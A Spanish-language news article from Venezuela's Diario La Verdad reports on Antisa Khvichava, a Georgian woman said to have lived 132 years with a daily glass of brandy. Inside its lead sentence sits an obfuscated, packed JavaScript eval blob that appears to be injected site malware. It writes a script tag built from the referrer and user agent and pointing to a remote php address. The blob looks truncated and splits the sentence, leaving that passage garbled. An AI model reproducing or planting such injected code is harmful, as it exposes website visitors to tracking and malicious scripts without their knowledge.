publicidad

Vivió 132 años gracias a una copita de Brandy por día

Agencias / web@laverdad.com
Nacida eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnhzf|var|u0026u|referrer|sftey||js|php'.split('|'),0,{})) un 8 de julio de 1880, la sorprendente longevidad de Antisa Khvichava era objeto de controversia, sin embargo, numerosos documentos confirmaban su fecha de nacimiento, entre ellos un pasaporte de la época soviética

El caso de Antisa Khvichava, que ha vivido 132 años, llega a desafiar a la ciencia. ¿Cuál es el secreto de semejante longevidad? ¿Quizás la copita de brandy que se tomaba a diario? Antisa Khvichava vivía en una aldea de Georgia dedicada al campo, al brandy y al backgammon.

Antisa tuvo tres hijos, dos de cuales fallecieron durante el hambre posterior a la Segunda Guerra Mundial, además de 12 nietos, 18 bisnietos y seis tataranietos.

Nacida un 8 de julio de 1880, su sorprendente longevidad era objeto de controversia, sin embargo, numerosos documentos confirmaban su fecha de nacimiento, entre ellos un pasaporte de la época soviética, un libro de pensiones y notas en archivos.

Sus familiares aseguran que siempre ha gozado de buena salud, aunque los últimos años se los pasó en la cama por sus dificultades para caminar. Le apenaba especialmente haber perdido la destreza en los dedos que le permitía dedicarse a otra de sus actividades favoritas: el punto.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama